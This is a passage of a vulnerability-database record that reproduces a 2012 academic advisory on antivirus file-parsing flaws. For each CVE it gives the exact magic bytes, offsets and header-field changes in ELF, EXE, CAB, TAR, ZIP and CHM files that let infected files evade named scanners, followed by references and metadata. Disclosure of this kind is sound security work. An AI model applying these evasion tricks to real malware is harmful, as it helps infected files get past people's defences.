eSafe 7.0.17.0, \n F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n CVE no - \n CVE-2012-1429\n12. Specially crafted infected ELF files with \"\\19\\04\\00\\10\" at offset 8 evades\n detection. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1430\n13. Specially crafted infected ELF files with \"\\4a\\46\\49\\46\" at offset 6 evades\n detection. \n\n Affected products -\n BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n 29 evades detection. \n\n Affected products -\n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n 6 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n 8 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n Panda 10.0.2.7\n \n CVE no - \n CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n offset 30 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n offset 2 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n offset 526 evades detection. \n \n Affected products - \n Comodo 7425\n \n CVE no - \n CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n offset 257 evades detection. \n\n Affected products - \n Comodo 7425, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1438\n\n21. \u0027padding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s padding field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1439\n\n22. \u0027identsize\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s identsize field is incremented by 1 it evades\n detection. \n\n Affected products - \n Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, \n Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1440\n\n23. \u0027e_ip\u0027 and \u0027e_res\u0027 field in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n Prevx 3.0\n\n \u0027e_minalloc\u0027, \u0027e_res2\u0027,\u0027e_cparhdr\u0027, \u0027e_crlc\u0027, \u0027e_lfarlc\u0027,\u0027e_maxalloc\u0027,\n \u0027e_oeminfo\u0027, \u0027e_ovno\u0027, \u0027e_cs\u0027, \u0027e_csum\u0027,\u0027e_sp\u0027, \u0027e_ss\u0027, \u0027e_cblp\u0027 and \n \u0027e_oemid\u0027 fields in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0\n\n\n CVE no - \n CVE-2012-1441\n\n24. \u0027class\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s class field is incremented by 1 it evades\n detection. Infected RAR files with initial two bytes set to \u0027MZ\u0027 can be fixed by the \n user and correctly extracted. Such a file evades detection. \n \n Affected products -\n ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n Avast5 5.0.677.0, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1443\n\n26. \u0027abiversion\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abiversion field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1444\n\n27. \u0027abi\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abi field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1445\n\n28. \u0027e_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s e_version field is incremented by 1 it evades\n detection. \n\n Affected products -\n Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1447\n\n30. \u0027cbCabinet\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s cbCabinet field is incremented by 1 it evades\n detection. \n\n Affected products -\n CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n CVE no - \n CVE-2012-1448\n\n31. \u0027vMajor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s vMajor field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1449\n\n32. \u0027reserved3\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1450\n\n33. \u0027reserved2\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved2 field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1451\n\n34. \u0027reserved1\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1452\n\n35. \u0027coffFiles\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s coffFiles field is incremented by 1 it evades\n detection. \u0027ei_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1454\n\n37. \u0027vMinor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n of a clean TAR archive and a virus-infected ZIP archive, is parsed \n incorrectly and evades detection. If the length field in the header of a file with test EICAR virus\n included into a TAR archive is set to be greater than the archive\u0027s total \n length (1,000,000+original length in our experiments), the antivirus \n declares the file to be clean but virus gets extracted correctly by the \n GNU tar program. \n\n Affected products -\n AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n CVE no - \n CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n scripts, and images compressed using the LZX algorithm. \n For faster random accesses, the algorithm is reset at intervals\n instead of compressing the entire file as a single stream. The\n length of each interval is specified in the LZXC header. \n\n If an infected CHM file\u0027s header modified so that the reset interval\n is lower than in the original file, the antivirus declares the file\n to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n the infected content located before the tampered header. \n\n Affected products -\n ClamAV 0.96.4, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n by a simple checksum. Every header also contains a file length field, which\n is used by the extractor to locate the next header in the archive. \n\n If a TAR archive contains two files: the first one is clean, while\n the second is infected with test EICAR virus - and it is modified such that \n the length field in the header of the first, clean file to point into the \n middle of the header of the second, infected file. The antivirus declares \n the file to be clean but virus gets extracted correctly by the \n GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, \n the antivirus declares the file to be clean but virus gets extracted by\n the gunzip+tar programs correctly by ignoring these bytes. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n \n CVE no - \n CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n when the contents are extracted. If an infected ZIP archive is prepended with 1024 random bytes at the \n beginning, the antivirus declares the file to be clean but virus gets extracted\n by the unzip program correctly by skipping these bytes\n\n Affected products -\n AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n Symantec 20101.3.0.103 \n\n CVE no - \n CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n for little-endian, 02 for bigendian. Linux kernel, however, does not\n check this field before loading an ELF file. If an infected ELF file\u0027s 5-th \n byte is set to 02, the antivirus declares the file to be clean but the ELF \n file gets executed correctly. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n CVE no - \n CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "PACKETSTORM",
"id": "110990"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-1446",
"trust": 2.9
},
{
"db": "BID",
"id": "52600",
"trust": 1.4
},
{
"db": "OSVDB",
"id": "80431",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80426",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80427",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80428",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80430",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-54727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110990",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"id": "VAR-201203-0370",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T22:49:45.235000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AVL SDK",
"trust": 0.8,
"url": "http://www.antiy.net/en/avlsdk.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.rising-global.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.vet.com.au/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.fortinet.com/"
},
{
"title": "MacAfee Scan Engine",
"trust": 0.8,
"url": "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.norman.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ps-japan.co.jp/"
},
{
"title": "PC Tools AntiVirus",
"trust": 0.8,
"url": "http://www.pctools.com/jp/spyware-doctor-antivirus/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.quickheal.com/"
},
{
"title": "Endpoint Protection",
"trust": 0.8,
"url": "http://www.symantec.com/ja/jp/endpoint-protection"
},
{
"title": "eSafe",
"trust": 0.8,
"url": "http://www.aladdin.co.jp/esafe/"
},
{
"title": "Kaspersky Anti-Virus",
"trust": 0.8,
"url": "http://www.kaspersky.com/kaspersky_anti-virus"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sophos.com"
},
{
"title": "McAfee Web Gateway",
"trust": 0.8,
"url": "http://www.mcafee.com/japan/products/web_gateway.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/522005"
},
{
"trust": 1.7,
"url": "http://www.ieee-security.org/tc/sp2012/program.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/52600"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80426"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80427"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80428"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80430"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80431"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1446"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1446"
},
{
"trust": 0.3,
"url": "http://www.antiy.net"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.mcafee.com/"
},
{
"trust": 0.3,
"url": "http://anti-virus-software-review.toptenreviews.com/norman-review.html"
},
{
"trust": 0.3,
"url": "http://www.pandasecurity.com/usa/"
},
{
"trust": 0.3,
"url": "http://www.pctools.com/spyware-doctor-antivirus/"
},
{
"trust": 0.3,
"url": "http://www.quickheal.com/"
},
{
"trust": 0.3,
"url": "http://www.rising-global.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://www.symantec.com"
},
{
"trust": 0.3,
"url": "/archive/1/522005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1419"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1439"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1429"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1440"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1432"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1438"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1428"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1446"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1443"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1444"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1441"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1421"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1430"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1435"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1431"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1423"
},
{
"trust": 0.1,
"url": "http://www.ieee-security.org/tc/sp2012/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1442"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1433"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1420"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1437"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54727"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52600"
},
{
"date": "2012-03-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"date": "2012-03-19T23:51:01",
"db": "PACKETSTORM",
"id": "110990"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-410"
},
{
"date": "2012-03-21T10:11:48.270000",
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-28T00:00:00",
"db": "VULHUB",
"id": "VHN-54727"
},
{
"date": "2012-03-30T16:10:00",
"db": "BID",
"id": "52600"
},
{
"date": "2012-03-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"date": "2012-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-410"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple products ELF Vulnerability that prevents file parsers from detecting malware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
],
"trust": 0.6
}
}
VAR-201203-0400
Vulnerability from variot - Updated: 2025-04-11 22:49The ELF file parser in Norman Antivirus 6.06.12, eSafe 7.0.17.0, CA eTrust Vet Antivirus 36.1.8511, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified identsize field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. CVE May be split intoChanged by a third party identsize Have fields ELF Via files, malware detection can be bypassed. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All affected products are command-line versions of the AVs.
Vulnerability Descriptions
- Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.
Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00
CVE no - CVE-2012-1419
- Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103
CVE no - CVE-2012-1421
- Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1422
- Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.
Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0
CVE no - CVE-2012-1423
- Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0
CVE no - CVE-2012-1424
- Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1426
- Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1427
- Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1428
Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01
CVE no - CVE-2012-1429 12.
Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1430 13.
Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1431
- Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1432
- Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1433
- Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1434
- Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1435
- Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1436
- Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.
